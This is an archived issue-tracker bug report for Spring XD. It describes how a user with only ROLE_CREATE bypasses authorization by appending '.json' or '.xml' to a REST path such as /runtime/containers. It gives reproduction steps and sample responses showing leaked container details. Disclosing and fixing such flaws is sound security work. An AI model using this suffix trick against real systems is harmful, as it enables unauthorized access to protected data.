Uploaded image for project: 'Spring XD'
  1. Spring XD
  2. XD-2872

Able to bypass authorization checks by appending ".json" or ".xml"

This issue belongs to an archived project. You can view it, but you can't modify it. Learn more

    XMLWordPrintable

Details

    • Bug
    • Status: Done
    • Critical
    • Resolution: Complete
    • 1.1.1
    • 1.2 RC1
    • REST

    Description

      How to reproduce:

      1) Enable security
      2) Use a user that has the following role only: "ROLE_CREATE"
      3) Make a normal REST call:

      http://localhost:9393/runtime/containers
      

      yields the desired response:

          {
             "timestamp": "2015-03-26T16:51:17.010Z",
             "status": 403,
             "error": "Forbidden",
             "message": "Access is denied",
             "path": "/runtime/containers"
          }
      

      Now try:

      http://localhost:9393/runtime/containers.json
      

      This produces:

          {
             "links":
             [
                 {
                     "rel": "self",
                     "href": "http://localhost:9393/runtime/containers{?page,size,sort}"
                 }
             ],
             "content":
             [
                 {
                     "containerId": "86eea5aa-b18e-41c5-a3f5-42dfa10713c1",
                     "groups": "",
                     "deploymentSize": 0,
                     "deployedModules":
                     [
                     ],
                     "messageRates": null,
                     "attributes":
                     {
                         "ip": "10.0.1.119",
                         "host": "INTEGRATION.local",
                         "groups": "",
                         "pid": "52686",
                         "id": "86eea5aa-b18e-41c5-a3f5-42dfa10713c1"
                     },
                     "links":
                     [
                         {
                             "rel": "self",
                             "href": "http://localhost:9393/runtime/containers/86eea5aa-b18e-41c5-a3f5-42dfa10713c1"
                         }
                     ]
                 }
             ],
             "page":
             {
                 "size": 20,
                 "totalElements": 1,
                 "totalPages": 1,
                 "number": 0
             }
          }
      

      Attachments

        Issue Links

          Activity

            People

              hillert Gunnar Hillert
              hillert Gunnar Hillert
              Archiver:
              tmarshall Trevor Marshall

              Dates

                Created:
                Updated:
                Resolved:
                Archived: